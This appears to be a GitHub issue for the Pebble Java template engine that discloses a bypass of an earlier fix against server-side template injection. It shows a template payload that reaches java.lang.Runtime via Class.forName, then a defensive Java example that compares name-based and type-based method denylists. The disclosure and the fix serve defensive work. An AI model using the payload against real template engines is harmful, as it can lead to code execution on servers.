Unsafe Methods Bypass #493
Comments
Is there any plan to address this vulnerability?
michalstodolny pushed a commit to michalstodolny/pebble that referenced this issue on Jan 22, 2020
Please review the pull request: #494
michalstodolny pushed a commit to michalstodolny/pebble that referenced this issue on Jan 24, 2020: …replaced with MethodAccessValidator
ebussieres pushed a commit to michalstodolny/pebble that referenced this issue on May 9, 2020
ebussieres pushed a commit to michalstodolny/pebble that referenced this issue on May 9, 2020: …replaced with MethodAccessValidator
ebussieres added a commit that referenced this issue on May 16, 2020: …rovide a NoOp method access and a default one (#493)
ebussieres added a commit that referenced this issue on May 18, 2020: …rovide a NoOp method access and a default one (#493)
I was reading about https://research.securitum.com/server-side-template-injection-on-the-example-of-pebble/ and found a bypass to the fix in 454.

The following code will throw a security exception after the fix in 454:

```
{{(1).TYPE.getClass()}}
```

However you can still access getClass via the `public static java.lang.Class java.lang.Class.forName(java.lang.Module,java.lang.String)` signature:

```
{%set daInt = (1).TYPE.protectiondomain().getPermissions.elementsAsStream.findFirst().get.hashCode.TYPE.getModule %}
{{(1).TYPE.protectiondomain().getPermissions.elementsAsStream.findFirst().get.hashCode.TYPE.forName(daInt,'java.lang.Runtime') }}
```

Result:

```
class java.lang.Runtime
```
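A defender's view of why a rule that only blocks `getClass` by name leaves the gap reported above, as an added example that is not part of the original issue or of Pebble's code. The class and method names are hypothetical, and the list of denied types is an illustrative assumption, not the list Pebble ships.

```java
import java.lang.reflect.AccessibleObject;
import java.lang.reflect.Member;
import java.lang.reflect.Method;
import java.util.Set;

// Added illustration: hypothetical names, not Pebble's MethodAccessValidator API.
public class MethodAccessCheckDemo {

    // Weak check: denies by method name only, like a rule that blocks getClass.
    static boolean nameDenylistAllows(Object receiver, Method m) {
        return !m.getName().equals("getClass");
    }

    // Types that hand out reflection, class loading or process control (assumed list).
    static final Set<Class<?>> DENIED_TYPES = Set.of(
            Class.class, ClassLoader.class, Runtime.class, Thread.class,
            ThreadGroup.class, ProcessBuilder.class, System.class,
            AccessibleObject.class, Member.class);

    // Stricter check: decide on the receiver and declaring type, not the method name.
    static boolean typeDenylistAllows(Object receiver, Method m) {
        // Of the methods declared on Object, allow only the harmless ones.
        if (m.getDeclaringClass() == Object.class
                && !Set.of("toString", "equals", "hashCode").contains(m.getName())) {
            return false;
        }
        for (Class<?> denied : DENIED_TYPES) {
            // Covers static methods such as Class.forName reached through an instance.
            if (denied.isInstance(receiver) || denied.isAssignableFrom(m.getDeclaringClass())) {
                return false;
            }
        }
        return true;
    }

    public static void main(String[] args) throws Exception {
        Method getClass = Object.class.getMethod("getClass");
        Method forName = Class.class.getMethod("forName", Module.class, String.class);
        Method length = String.class.getMethod("length");
        Object cls = Integer.TYPE; // what (1).TYPE evaluates to: a java.lang.Class instance

        System.out.println("name check, getClass on Class: " + nameDenylistAllows(cls, getClass));
        System.out.println("name check, forName on Class:  " + nameDenylistAllows(cls, forName));
        System.out.println("type check, forName on Class:  " + typeDenylistAllows(cls, forName));
        System.out.println("type check, length on String:  " + typeDenylistAllows("abc", length));
    }
}
```

A type denylist still has to enumerate every dangerous type; an allowlist of permitted receiver types fails closed when a new one appears.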